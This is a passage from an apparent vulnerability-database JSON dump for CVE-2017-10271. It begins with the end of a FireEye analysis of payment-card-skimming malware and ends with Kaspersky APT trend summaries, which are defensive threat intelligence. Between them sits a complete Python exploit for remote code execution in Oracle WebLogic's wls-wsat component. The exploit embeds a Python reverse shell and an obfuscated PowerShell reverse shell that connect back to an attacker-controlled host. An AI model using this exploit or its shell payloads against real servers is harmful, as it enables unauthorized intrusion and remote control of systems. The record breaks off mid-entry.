C:\\bea\\c2gdomain\\applications\\ePortalLocalService\\axis2-web\\RightFrame.jsp\n\nIf either file does not exist, the malware Base64 decodes an embedded SJavaWebManage webshell and writes the same file to either path. This is the same webshell installed by the attacker during the initial compromise.\n\nAdditionally, SPOTLIGHT starts a socket listener to inspect IPv4 TCP traffic on port 80 and 7101. According to a Superion installation checklist, TCP port 7101 is used for application resolution from the internal network to the Click2Gov webserver. As long as the connection contents do not begin with GET /, the malware begins saving a buffer of received packets. The malware continues saving packet contents to an internal buffer until one of two conditions occurs \u2013 the buffer exceeds the size 102399 or the packet contents begin with the string POST /OnePoint/services/OnePointService. If either of these two conditions occur, the internal buffer data is searched for the following tags:\n\n * <op:AccountNum>\n * <op:CSC>\n * <op:ExpDate>\n * <op:FirstName>\n * <op:LastName>\n * <op:MInitial>\n * <op:Street1>\n * <op:Street2>\n * <op:City>\n * <op:State>\n * <op:PostalCode>\n\nThe contents between the tags are extracted and formatted with a `|`, which is used as a separator character. The formatted data is then Base64 encoded and appended to a log file at the hard-coded file path: c:\\windows\\temp\\opt.log. The attacker then used SJavaWebManage to exfiltrate the Base64 encoded log file containing payment card data. FireEye has not identified any manipulation of a compromised host\u2019s SSL configuration settings or redirection of SSL traffic to an unencrypted port. This process is depicted in Figure 3.\n\n \nFigure 3: SPOTLIGHT workflow\n\n 1. SPOTLIGHT verifies webshell file on an hourly basis, writing SJavaWebManage if missing.\n 2. SPOTLIGHT inspects IPv4 TCP traffic on port 80 or 7101, saving a buffer of received packets.\n 3. 
A user accesses Click2Gov module to make a payment.\n 4. SPOTLIGHT parses packets for payment card data, Base64 encodes and writes to opt.log.\n 5. Attacker traverses Tor or other proxy and authenticates to SJavaWebManage and launches File Manager.\n 6. Attacker exfiltrates opt.log file.\n\n#### Attribution\n\nBased on the available campaign information, the attacker doesn\u2019t align with any financially motivated threat groups currently tracked by FireEye. The attacker\u2019s understanding of the Click2Gov host requirements, process logging details, payment card fields, and internal communications protocols demonstrates an advanced knowledge of the Click2Gov application. Given the manner in which underground forums and marketplaces function, it is possible that tool development could have been contracted to third parties and remote access to compromised systems could have been achieved by one entity and sold to another. There is much left to be uncovered about this attacker. \n\nWhile it is also possible the attack was conducted by a single individual, FireEye assesses, with moderate confidence, that a team was likely involved in this campaign based on the following requisite skillsets:\n\n * Ability to locate Click2Gov installations and identify exploitable vulnerabilities.\n * Ability to craft or reuse an exploit to penetrate the target organization\u2019s network environment.\n * Basic JSP programming skills.\n * Advanced knowledge of Click2Gov payment processes and software sufficient to develop moderately sophisticated malware.\n * Proficient C/C++ programming skills.\n * General awareness of operational security.\n * Ability to monetize stolen payment card information.\n\n#### Conclusion\n\nIn addition to a regimented patch management program, FireEye recommends that organizations consider implementing a file integrity monitoring solution to monitor the static content and code that generates dynamic content on e-commerce webservers for unexpected 
modifications. Another best practice is to ensure any web service accounts run with least privilege.\n\nAlthough the TTPs observed in the attack lifecycle are generally consistent with other financially motivated attack groups tracked by FireEye, this attacker demonstrated ingenuity in crafting malware exploiting Click2Gov installations, achieving moderate success. Although it may transpire in a new form, FireEye anticipates this threat actor will continue to conduct interactive and financially motivated attacks.\n\n#### Detection\n\nFireEye\u2019s Adversary Pursuit Team from Technical Operations & Reverse Engineering \u2013 Advanced Practices works jointly with Mandiant Consulting and FireEye Labs Advanced Reverse Engineering (FLARE) during investigations assessed as directly supporting nation-state or financially motivated intrusions targeting organizations and involving interactive and focused efforts. The synergy of this relationship allows FireEye to rapidly identify new activity associated with currently tracked threat groups, as well as new threat actors, advanced malware, or TTPs leveraged by threat groups, and quickly mitigate them across the FireEye enterprise.\n\nFireEye detects the malware documented in this blog post as the following:\n\n * FE_Tool_Win32_FIREALARM_1\n * FE_Trojan_Win64_SPOTLIGHT_1\n * FE_Webshell_JSP_SJavaWebManage_1\n * Webshell.JSP.SJavaWebManage\n\n#### Indicators of Compromise (MD5)\n\n_SJavaWebManage_\n\n * 91eaca79943c972cb2ca7ee0e462922c \n * 80f8a487314a9573ab7f9cb232ab1642 \n * cc155b8cd261a6ed33f264e710ce300e (Publicly available version)\n\n_FIREALARM_\n\n * e2c2d8bad36ac3e446797c485ce8b394\n\n_SPOTLIGHT_\n\n * d70068de37d39a7a01699c99cdb7fa2b\n * 1300d1f87b73d953e20e25fdf8373c85\n * 3bca4c659138e769157f49942824b61f\n", "modified": "2018-09-19T10:00:00", "published": "2018-09-19T10:00:00", "id": "FIREEYE:C097B41677EDE5F95DB4B84AD6726751", "href": 
"https://www.fireeye.com/blog/threat-research/2018/09/click-it-up-targeting-local-government-payment-portals.html", "type": "fireeye", "title": "Click It Up: Targeting Local Government Payment Portals", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "zdt": [{"lastseen": "2018-03-21T00:16:24", "description": "The Oracle WebLogic WLS WSAT component is vulnerable to an XML deserialization remote code execution vulnerability. Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0.", "edition": 1, "published": "2018-01-29T00:00:00", "type": "zdt", "title": "Oracle WebLogic - wls-wsat Component Deserialization Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-10271"], "modified": "2018-01-29T00:00:00", "href": "https://0day.today/exploit/description/29668", "id": "1337DAY-ID-29668", "sourceData": "", "sourceHref": "https://0day.today/exploit/29668", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-04-14T17:44:57", "description": "Exploit for multiple platform in category remote exploits", "edition": 1, "published": "2018-01-08T00:00:00", "type": "zdt", "title": "Oracle WebLogic < 10.3.6 - wls-wsat Component Deserialisation Remote Command Execution Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-10271"], "modified": "2018-01-08T00:00:00", "href": "https://0day.today/exploit/description/29395", "id": "1337DAY-ID-29395", "sourceData": "#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n# Exploit Title: Weblogic wls-wsat Component Deserialization RCE\r\n# Date Authored: Jan 3, 2018\r\n# Date Announced: 10/19/2017\r\n# Exploit Author: Kevin Kirsche (d3c3pt10n)\r\n# Exploit Github: https://github.com/kkirsche/CVE-2017-10271\r\n# Exploit is based off of POC by Luffin from Github\r\n# https://github.com/Luffin/CVE-2017-10271\r\n# Vendor Homepage: 
http://www.oracle.com/technetwork/middleware/weblogic/overview/index.html\r\n# Version: 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0\r\n# Tested on: Oracle WebLogic 10.3.6.0.0 running on Oracle Linux 6.8 and Ubuntu 14.04.4 LTS\r\n# CVE: CVE-2017-10271\r\n# Usage: python exploit.py -l 10.10.10.10 -p 4444 -r http://will.bepwned.com:7001/\r\n# (Python 3) Example check listener: python3 -m http.server 4444\r\n# (Python 2) Example check listener: python -m SimpleHTTPServer 4444\r\n# (Netcat) Example exploit listener: nc -nlvp 4444\r\n \r\nfrom sys import exit\r\nfrom requests import post\r\nfrom argparse import ArgumentParser\r\nfrom random import choice\r\nfrom string import ascii_uppercase, ascii_lowercase, digits\r\nfrom xml.sax.saxutils import escape\r\n \r\nclass Exploit:\r\n \r\n def __init__(self, check, rhost, lhost, lport, windows):\r\n self.url = rhost if not rhost.endswith('/') else rhost.strip('/')\r\n self.lhost = lhost\r\n self.lport = lport\r\n self.check = check\r\n if windows:\r\n self.target = 'win'\r\n else:\r\n self.target = 'unix'\r\n \r\n if self.target == 'unix':\r\n # Unix reverse shell\r\n # You should also be able to instead use something from MSFVenom. 
E.g.\r\n # msfvenom -p cmd/unix/reverse_python LHOST=10.10.10.10 LPORT=4444\r\n self.cmd_payload = (\r\n \"python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.\"\r\n \"SOCK_STREAM);s.connect((\\\"{lhost}\\\",{lport}));os.dup2(s.fileno(),0); os.dup2(\"\r\n \"s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\\\"/bin/sh\\\",\\\"-i\\\"]);'\"\r\n ).format(lhost=self.lhost, lport=self.lport)\r\n else:\r\n # Windows reverse shell\r\n # Based on msfvenom -p cmd/windows/reverse_powershell LHOST=10.10.10.10 LPORT=4444\r\n self.cmd_payload = (\r\n r\"powershell -w hidden -nop -c function RSC{if ($c.Connected -eq $true) \"\r\n r\"{$c.Close()};if ($p.ExitCode -ne $null) {$p.Close()};exit;};$a='\" + self.lhost +\"\"\r\n r\"';$p='\"+ self.lport + \"';$c=New-Object system.net.sockets.tcpclient;$c.connect($a\"\r\n r\",$p);$s=$c.GetStream();$nb=New-Object System.Byte[] $c.ReceiveBufferSize;\"\r\n r\"$p=New-Object System.Diagnostics.Process;$p.StartInfo.FileName='cmd.exe';\"\r\n r\"$p.StartInfo.RedirectStandardInput=1;$p.StartInfo.RedirectStandardOutput=1;\"\r\n r\"$p.StartInfo.UseShellExecute=0;$p.Start();$is=$p.StandardInput;\"\r\n r\"$os=$p.StandardOutput;Start-Sleep 1;$e=new-object System.Text.AsciiEncoding;\"\r\n r\"while($os.Peek() -ne -1){$o += $e.GetString($os.Read())};\"\r\n r\"$s.Write($e.GetBytes($o),0,$o.Length);$o=$null;$d=$false;$t=0;\"\r\n r\"while (-not $d) {if ($c.Connected -ne $true) {RSC};$pos=0;$i=1; while (($i -gt 0)\"\r\n r\" -and ($pos -lt $nb.Length)) {$r=$s.Read($nb,$pos,$nb.Length - $pos);$pos+=$r;\"\r\n r\"if (-not $pos -or $pos -eq 0) {RSC};if ($nb[0..$($pos-1)] -contains 10) {break}};\"\r\n r\"if ($pos -gt 0){$str=$e.GetString($nb,0,$pos);$is.write($str);start-sleep 1;if \"\r\n r\"($p.ExitCode -ne $null){RSC}else{$o=$e.GetString($os.Read());while($os.Peek() -ne\"\r\n r\" -1){$o += $e.GetString($os.Read());if ($o -eq $str) {$o=''}};$s.Write($e.\"\r\n r\"GetBytes($o),0,$o.length);$o=$null;$str=$null}}else{RSC}};\"\r\n )\r\n 
self.cmd_payload = escape(self.cmd_payload)\r\n \r\n def cmd_base(self):\r\n if self.target == 'win':\r\n return 'cmd'\r\n return '/bin/sh'\r\n \r\n def cmd_opt(self):\r\n if self.target == 'win':\r\n return '/c'\r\n return '-c'\r\n \r\n \r\n def get_generic_check_payload(self):\r\n random_uri = ''.join(\r\n choice(ascii_uppercase + ascii_lowercase + digits)\r\n for _ in range(16))\r\n generic_check_payload = '''<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">\r\n <soapenv:Header>\r\n <work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">\r\n <java version=\"1.8\" class=\"java.beans.XMLDecoder\">\r\n <object id=\"url\" class=\"java.net.URL\">\r\n <string>http://{lhost}:{lport}/{random_uri}</string>\r\n </object>\r\n <object idref=\"url\">\r\n <void id=\"stream\" method = \"openStream\" />\r\n </object>\r\n </java>\r\n </work:WorkContext>\r\n </soapenv:Header>\r\n <soapenv:Body/>\r\n</soapenv:Envelope>\r\n'''\r\n \r\n return generic_check_payload.format(\r\n lhost=self.lhost, lport=self.lport, random_uri=random_uri)\r\n \r\n def get_process_builder_payload(self):\r\n process_builder_payload = '''<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">\r\n <soapenv:Header>\r\n <work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">\r\n <java>\r\n <object class=\"java.lang.ProcessBuilder\">\r\n <array class=\"java.lang.String\" length=\"3\" >\r\n <void index=\"0\">\r\n <string>{cmd_base}</string>\r\n </void>\r\n <void index=\"1\">\r\n <string>{cmd_opt}</string>\r\n </void>\r\n <void index=\"2\">\r\n <string>{cmd_payload}</string>\r\n </void>\r\n </array>\r\n <void method=\"start\"/>\r\n </object>\r\n </java>\r\n </work:WorkContext>\r\n </soapenv:Header>\r\n <soapenv:Body/>\r\n</soapenv:Envelope>\r\n'''\r\n return process_builder_payload.format(cmd_base=self.cmd_base(), cmd_opt=self.cmd_opt(),\r\n cmd_payload=self.cmd_payload)\r\n \r\n def print_banner(self):\r\n print(\"=\" * 80)\r\n 
print(\"CVE-2017-10271 RCE Exploit\")\r\n print(\"written by: Kevin Kirsche (d3c3pt10n)\")\r\n print(\"Remote Target: {rhost}\".format(rhost=self.url))\r\n print(\"Shell Listener: {lhost}:{lport}\".format(\r\n lhost=self.lhost, lport=self.lport))\r\n print(\"=\" * 80)\r\n \r\n def post_exploit(self, data):\r\n headers = {\r\n \"Content-Type\":\r\n \"text/xml;charset=UTF-8\",\r\n \"User-Agent\":\r\n \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36\"\r\n }\r\n payload = \"/wls-wsat/CoordinatorPortType\"\r\n \r\n vulnurl = self.url + payload\r\n try:\r\n req = post(\r\n vulnurl, data=data, headers=headers, timeout=10, verify=False)\r\n if self.check:\r\n print(\"[*] Did you get an HTTP GET request back?\")\r\n else:\r\n print(\"[*] Did you get a shell back?\")\r\n except Exception as e:\r\n print('[!] Connection Error')\r\n print(e)\r\n \r\n def run(self):\r\n self.print_banner()\r\n if self.check:\r\n print('[+] Generating generic check payload')\r\n payload = self.get_generic_check_payload()\r\n else:\r\n print('[+] Generating execution payload')\r\n payload = self.get_process_builder_payload()\r\n print('[*] Generated:')\r\n print(payload)\r\n if self.check:\r\n print('[+] Running generic check payload')\r\n else:\r\n print('[+] Running {target} execute payload').format(target=self.target)\r\n \r\n self.post_exploit(data=payload)\r\n \r\n \r\nif __name__ == \"__main__\":\r\n parser = ArgumentParser(\r\n description=\r\n 'CVE-2017-10271 Oracle WebLogic Server WLS Security exploit. 
Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0.'\r\n )\r\n parser.add_argument(\r\n '-l',\r\n '--lhost',\r\n required=True,\r\n dest='lhost',\r\n nargs='?',\r\n help='The listening host that the remote server should connect back to')\r\n parser.add_argument(\r\n '-p',\r\n '--lport',\r\n required=True,\r\n dest='lport',\r\n nargs='?',\r\n help='The listening port that the remote server should connect back to')\r\n parser.add_argument(\r\n '-r',\r\n '--rhost',\r\n required=True,\r\n dest='rhost',\r\n nargs='?',\r\n help='The remote host base URL that we should send the exploit to')\r\n parser.add_argument(\r\n '-c',\r\n '--check',\r\n dest='check',\r\n action='store_true',\r\n help=\r\n 'Execute a check using HTTP to see if the host is vulnerable. This will cause the host to issue an HTTP request. This is a generic check.'\r\n )\r\n parser.add_argument(\r\n '-w',\r\n '--win',\r\n dest='windows',\r\n action='store_true',\r\n help=\r\n 'Use the windows cmd payload instead of unix payload (execute mode only).'\r\n )\r\n \r\n args = parser.parse_args()\r\n \r\n exploit = Exploit(\r\n check=args.check, rhost=args.rhost, lhost=args.lhost, lport=args.lport,\r\n windows=args.windows)\r\n exploit.run()\n\n# 0day.today [2018-04-14] #", "sourceHref": "https://0day.today/exploit/29395", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "securelist": [{"lastseen": "2019-10-16T11:39:54", "bulletinFamily": "blog", "cvelist": ["CVE-2017-10271"], "description": "\n\nFor more than two years, the Global Research and Analysis Team (GReAT) at Kaspersky has been publishing quarterly summaries of advanced persistent threat (APT) activity. The summaries are based on our threat intelligence research and provide a representative snapshot of what we have published and discussed in greater detail in our private APT reports. 
They are designed to highlight the significant events and findings that we feel people should be aware of.\n\nThis is our latest installment, focusing on activities that we observed during Q3 2019.\n\nReaders who would like to learn more about our intelligence reports or request more information on a specific report are encouraged to contact intelreports@kaspersky.com.\n\n## **The most remarkable findings**\n\nOn August 30, Ian Beer from Google's Project Zero team published an extensive analysis of at least 14 iOS zero-days found in the wild and used in five exploitation chains to escalate privileges by an unknown threat actor. Although the use of watering-hole attacks was popular in the early 2010s, it has now become less common. According to Google, a number of waterholed websites were delivering the exploits, possibly as far back as three years ago (based on September 2016 usage of the first exploit chain). While the blog contains no details about the compromised sites or if they are still active, it claims that these websites receive \"thousands of visitors per week\". The first stage Webkit exploit used to infect visitors makes no discrimination other than that the victim uses an iPhone and browses the website with Safari, although the vulnerability would also have worked in other browsers such as Chrome. The lack of victim discrimination would point to a relatively non-targeted attack, but the not-so-high estimate of the number of visitors to the waterholed sites seems to indicate that the attack was targeted at some communities: it is likely that these waterholed sites were all dedicated to some common topic. The blog does not contain many details regarding who the actor behind this attack is, but the high technical capabilities needed to deliver and install this malware, and keep the exploitation chains up-to-date for more than two years, show a high level of resources and dedication. Upon infection, the malware itself will be invisible to the victim. 
It pings its C2 every 60 seconds for new commands. It is able to get access to all kinds of files in the system, as well as tracking GPS position. There is no mechanism to survive a reboot, but the capability to steal signing-in cookies from a victim's account can keep providing the attackers with access to this data.\n\nShortly after the Google blogpost, Volexity published more details about the waterholing websites used in the attack to distribute the malware, pointing to a \"strategic web compromise targeting Uyghurs\". Citizen Lab published the Android counterpart for this story, stating that between November 2018 and May 2019, senior members of Tibetan groups were targeted by the same actor (this time dubbed POISON CARP by Citizen Lab) using malicious links in WhatsApp text exchanges, with the attackers posing as NGO workers, journalists and other fake personas. The links led to code designed to exploit web browser vulnerabilities to install spyware on iOS and Android devices, and in some cases to OAuth phishing pages.\n\nAt the beginning of September 2019, Zerodium, a zero-day brokerage firm, indicated that a zero-day for Android was now worth more than one for iOS: the exploit broker is now willing to pay $2.5 million for a zero-click Android zero-day with persistence. This is a significant increase on the company's previous payout ceiling of $2 million for remote iOS jailbreaks. By contrast, Zerodium [has also reduced payouts](<https://threatpost.com/android-zero-days-worth-more-iphone-exploits/147981/>) for Apple one-click exploits. On the same day, a high-severity zero-day was found in the v412 (Video4Linux) driver, the Android media driver. This vulnerability, which could enable privilege escalation, [was not included](<https://threatpost.com/android-zero-day-bug-opens-door-to-privilege-escalation-attack-researchers-warn/148014/>) in Google's September security update. 
A few days later, an Android flaw was identified that left more than a billion Samsung, Huawei, LG and Sony smartphones vulnerable to an attack that would allow an attacker to [gain full access](<https://www.independent.co.uk/life-style/gadgets-and-tech/news/android-security-flaw-hack-samsung-huawei-phone-text-message-sms-a9093111.html>) to emails on a compromised device using an SMS message.\n\n## **Russian-speaking activity**\n\nTurla (aka Venomous Bear, Uroburos and Waterbug) has made significant changes to its toolset. While investigating malicious activity in Central Asia, we identified a new backdoor that we attribute with medium confidence to this APT group. The malware, named Tunnus, is a .NET-based backdoor with the ability to run commands or perform file actions on an infected system and send the results to its C2. So far, the C2 infrastructure has been built using compromised sites with vulnerable WordPress installations. According to our telemetry, Tunnus activity started in March and was still active when we published our private report in July.\n\nTurla has also wrapped its notorious JavaScript KopiLuwak malware in a dropper called Topinambour, a new .NET file that the group is using to distribute and drop KopiLuwak through infected installation packages for legitimate software programs such as VPNs. Some of the changes are to help Turla evade detection. For example, the C2 infrastructure uses IP addresses that appear to mimic ordinary LAN addresses. The malware is almost completely 'fileless': the final stage of infection, an encrypted Trojan for remote administration, is embedded into the computer's registry for the malware to access when ready. Two KopiLuwak analogues \u2013 the .NET RocketMan Trojan and the PowerShell MiamiBeach Trojan \u2013 are used for cyber-espionage. We think that the threat actor deploys these versions where their targets are protected with security software capable of detecting KopiLuwak. 
All three implants can fingerprint targets, gather information on system and network adapters, steal files and download and execute additional malware. MiamiBeach is also able to take screenshots.\n\nIn September, Zebrocy spear-phished multiple NATO and alliance partners throughout Europe, attempting to gain access to email communications, credentials and sensitive documents. This campaign is similar to past Zebrocy activity, with target-relevant content used within emails, and ZIP attachments containing harmless documents alongside executables with altered icons and identical filenames. The group also makes use of remote Word templates pulling contents from the legitimate Dropbox file sharing site. In this campaign, Zebrocy targeted defense and diplomatic targets located throughout Europe and Asia with its Go backdoor and Nimcy variants.\n\n## **Chinese-speaking activity**\n\nHoneyMyte (aka Temp.Hex and Mustang Panda), which has been active for several years, has adopted different techniques to perform its attacks over the past couple of years, and has focused on various targeting profiles. In previous attacks, conducted from mid-2018, this threat actor deployed PlugX implants, as well as multi-stage PowerShell scripts resembling CobaltStrike. That campaign targeted government entities in Myanmar, Mongolia, Ethiopia, Vietnam and Bangladesh. We recently described a new set of activities from HoneyMyte involving attacks that relied on several types of tools. They include: (a) PlugX implants; (b) a multi-stage package resembling the CobaltStrike stager and stageless droppers with PowerShell and VB scripts,.NET executables, cookie-stealers and more; (c) ARP poisoning with DNS hijacking malware, to deliver poisoned Flash and Microsoft updates over http for lateral movement; (d) various system and network utilities. 
Based on the targeting of government organizations related to natural resource management in Myanmar and a major continental organization in Africa, we assess that one of the main motivations of HoneyMyte is gathering geo-political and economic intelligence. While a military organization was targeted in Bangladesh, it's possible that the individual targets were related to geopolitical activity in the region.\n\nSince the beginning of 2019, we have observed a spike in LuckyMouse activity, both in Central Asia and the Middle East. For these new campaigns, the attackers seem to focus on telecommunications operators, universities and governments. The infection vectors are direct compromise, spear phishing and, possibly, watering holes. LuckyMouse hasn't changed any of its TTPs (Tactics, Techniques and Procedures), continuing to rely on its own tools to get a foothold in the victim's network. The new campaigns consist of HTTPBrowser as a first stage, followed by the Soldier Trojan as a second-stage implant. The attackers made a change to their infrastructure, as they seem to solely rely on IPv4 addresses instead of domain names for their C2s, which can be seen as an attempt by them to limit correlation. The campaigns from this actor were still active at the time we published our latest private report on LuckyMouse in September.\n\nOur January 2018 private report 'ShaggyPanther \u2013 Chinese-speaking cluster of activity in APAC' introduced ShaggyPanther, a previously unseen malware and intrusion set targeting Taiwan and Malaysia. Related components and activity span back over a decade, with similar code maintaining compilation timestamps as far back as 2004. Since then ShaggyPanther activity has been detected in several more locations: the most recent detections occurred on servers in Indonesia in July, and, somewhat surprisingly, in Syria in March. 
The newer 2018 and 2019 backdoor code maintains a new layer of obfuscation and no longer maintains clear-text C2 strings. Since our original release, we have identified an initial server-side infection vector from this actor, using SinoChopper/ChinaChopper, a commonly used webshell shared across multiple Chinese-speaking actors. SinoChopper is not only used to perform host identification and backdoor delivery but also email archive theft and additional activity. Though not all incidents can be traced back to server-side exploitation, we did detect a couple of cases and obtained information about their staged install process. In 2019 we observed ShaggyPanther targeting Windows servers.\n\n## **Middle East**\n\nOn August 1, Dragos published an overview of attacks called 'Oil and Gas Threat Perspective Summary', which references an alleged new threat actor they call Hexane. According to the report, \"HEXANE targets oil and gas and telecommunications in Africa, the Middle East, and Southwest Asia\". Dragos claims to have identified the group in May 2019, associating it with OilRig and CHRYSENE. Although no IoCs have been made publicly available, some researchers have shared hashes in a Twitter thread in response to the Dragos announcement. Our analysis reveals some low-confidence similarities with OilRig based on TTPs, which is something that Dragos also mentions in its research. If this is indeed the case, the recent leaks from Lab Dookhtegan and GreenLeakers offer several hypotheses about this group's emergence. Due to exposure and leaks, OilRig may simply have changed its toolset and continued to operate as usual: this would imply a quick and flexible response to the leaks from this actor. Or perhaps some of the OilRig TTPs were adopted by a new group that seems to have similar interests. Hexane's activity appears to have started around September 2018 with a second wave of activity starting in May 2019. 
In all cases, the artefacts used in the attacks are relatively unsophisticated. The constant evolution of the droppers seems to indicate a trial-and-error period where attackers were testing how best to evade detection. The TTPs we can link to previous OilRig activity include the described trial-and-error process, the use of simplistic unsophisticated droppers distributed through spear phishing and DNS-based C2 exfiltration.\n\nTortoiseShell is a new cluster of activities associated with an unknown APT actor, revealed by Symantec on September 18, 2019. Symantec claims that the first signs of activity were seen in July 2018, and are still active one year later; Kaspersky has seen different TortoiseShell artifacts dating back to January 2018. To date, all registered attacks, according to our telemetry, are in Saudi Arabia. Symantec's report also confirms that the majority of the infections they found were in the same location. The attackers deploy their Syskit backdoor and then use it for reconnaissance. Other tools deployed on the victim machines are designed to collect files and pack them using RAR, gathering further system information. In one case, the attackers deployed the TightVNC remote administration tool to obtain full access to a machine. Symantec mentions traces of OilRig tools in some of the victims, something which we cannot confirm. Also, they mention in their blogpost the possibility that this was distributed through a supply chain attack. We were able to see the malware being distributed through a fake application distributed from a specifically created website for war veterans around two months before the publication of our report. The website was activated shortly after we published our report during a national holiday period in Saudi Arabia. 
However, we didn't find any compromised application that could suggest a supply chain attack.\n\n## **Southeast Asia and the Korean Peninsula**\n\nRecently we discovered new Android malware disguised as a mobile messenger or as cryptocurrency-related applications. The new malware has several connections with KONNI, a Windows malware strain that has been used in the past to target a human rights organization and an individual/organization with an interest in Korean Peninsula affairs. KONNI has also previously targeted cryptocurrencies. The infected apps don't steal cryptocurrencies from a specific trading application or switch wallet addresses; they implement full-featured functionalities to control an infected Android device and steal personal cryptocurrency using these features. We worked closely with a local CERT in order to take down the attacker's server, giving us a chance to investigate it.\n\nWe recently tracked new BlueNoroff activity. In particular, we identified a bank in Myanmar that was compromised by this actor and promptly contacted it to share the IoCs we had found. This collaboration allowed us to obtain valuable information on how the attackers move laterally to access high value hosts, such as those owned by the bank's system engineers interacting with SWIFT. They use a public login credential dumper and homemade PowerShell scripts for lateral movement. BlueNoroff also employs new malware with an uncommon structure, probably to slow down analysis. Depending on the command line parameters, this malware can run as a passive backdoor, an active backdoor or a tunneling tool; we believe the group runs this tool in different modes depending on the situation. Moreover, we found another type of PowerShell script used by this threat actor when it attacked a target in Turkey. 
This PowerShell script has similar functionality to those used previously, but BlueNoroff keeps changing it to evade detection.\n\nKaspersky observed a recent campaign utilizing a piece of malware referred to by FireEye as DADJOKE. This malware was first used in the wild in January 2019 and has undergone constant development since then. We have only observed this malware being used in a small number of active campaigns since January, all targeting government, military, and diplomatic entities in the Southeast Asia region. The latest campaign was conducted on August 29 and seems to have targeted only a select few individuals working for a military organization.\n\nThe Andariel APT group, considered to be a sub-group of Lazarus, was initially described by the South Korean Financial Security Institute (FSI) in 2017. This threat actor has traditionally focused on geopolitical espionage and financial intelligence in South Korea. We have released several private intelligence reports on the group. We recently observed new efforts by this actor to build a new C2 infrastructure targeting vulnerable Weblogic servers, in this case exploiting CVE-2017-10271. Following a successful breach, the attackers implanted malware signed with a legitimate signature belonging to a South Korean security software vendor. Thanks to the quick response of the South Korean CERT, this signature was soon revoked. The malware is a brand new type of backdoor, called ApolloZeus, started by a shellcode wrapper with complex configuration data. This backdoor uses a relatively large shellcode in order to make analysis difficult. In addition, it implements a set of features to execute the final payload discreetly. The discovery of this malware allowed us to find several related samples, as well as documents used by the attackers to distribute it, providing us with a better understanding of the campaign. 
Indeed, we believe this attack is an early preparation stage for a new campaign, which also points to the attacker's intentions to replace their malware framework with the newly discovered artifacts.\n\n## **Other interesting discoveries**\n\nThe well-known Shadow Brokers leak, Lost in Translation, included an interesting Python script \u2013 sigs.py \u2013 that contained lots of functions to check if a system had already been compromised by another threat actor. Each check is implemented as a function that looks for a unique signature in the system, for example, a file with a unique name or registry path. Although some checks are empty, 44 entries are listed in sigs.py, many of them related to unknown APTs that have not yet been publicly described. In 2018, we identified the APT described as the 27th function of the sigs.py file, which we call DarkUniverse. We assess with medium confidence that DarkUniverse is connected with the [ItaDuke](<https://www.fireeye.com/blog/threat-research/2013/02/its-a-kind-of-magic-1.html>) set of activity due to unique code overlaps. The main component is a rather simple DLL with only one exported function that implements persistence, malware integrity, communication with the C2 and control over other modules. We found about 20 victims in Western Asia and Northeastern Africa, including medical institutions, atomic energy bodies, military organizations and telecommunications companies.\n\nSince the beginning of 2019, we have observed the operation of new RCS (Remote Control System) implants for Android. RCS uses watermarks for different customers, which allowed us to correlate post-leak activity in the wild to obtain a global picture of how this malware is still being used, including the most recent cases. We detected RCS being used in Ethiopia in February, while additional samples with the same watermark were also detected in Morocco. 
The deployment method used depends on the actor, but the most common method consists of sending a legitimate backdoored application with RCS directly to the target using IM services (Telegram and WhatsApp).\n\n## **Final thoughts**\n\nIn seeking to evade detection, threat actors are refreshing their toolsets. This quarter, we have seen this clearly in Turla's development of its Tunnus backdoor and Topinambour dropper.\n\nHowever, when a new campaign is observed, it's not always immediately clear whether the tools used are the result of an established threat actor revamping its tools or a completely new threat actor making use of the tools developed by an existing APT group. In the case of Hexane, for example, it's unclear if this is a new development by OilRig, or the use of OilRig TTPs by a new group with similar interests in the Middle East, Africa and Southwest Asia.\n\nKorean-focused APT campaigns continue to dominate activities in Southeast Asia, a trend we first noted in our Q2 report.\n\nDespite the lower payouts by Zerodium for iOS exploits relative to those for Android, it's clear that mobile exploits continue to fetch very high prices. Our research into the ongoing use of RCS implants for Android and the revelations about the use of multiple iOS zero-days as described by Google and Citizen Lab underline the fact that mobile platforms have now become a standard aspect of APT attacks.\n\nAs always, we would note that our reports are the product of our visibility into the threat landscape. 
However, it needs to be borne in mind that, while we strive to continually improve, there is always the possibility that other sophisticated attacks may fly under our radar.", "modified": "2019-10-16T10:00:26", "published": "2019-10-16T10:00:26", "id": "SECURELIST:2782756D428D10F166A1D130F4307D33", "href": "https://securelist.com/apt-trends-report-q3-2019/94530/", "type": "securelist", "title": "APT trends report Q3 2019", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-12-11T13:21:36", "bulletinFamily": "blog", "cvelist": ["CVE-2017-10271", "CVE-2019-0797"], "description": "\n\nWhat were the most interesting developments in terms of APT activity during the year and what can we learn from them?\n\nThis is not an easy question to answer, because researchers have only partial visibility and it's impossible to fully understand the motivation for some attacks or the developments behind them. However, let's try to approach the problem from different angles in order to get a better understanding of what happened with the benefit of hindsight and perspective.\n\n## Compromising supply chains\n\nTargeting supply chains has proved very successful for attackers in recent years \u2013 high-profile examples include [ShadowPad](<https://securelist.com/shadowpad-in-corporate-networks/81432/>), [ExPetr](<https://securelist.com/schroedingers-petya/78870/>) and [the backdooring of 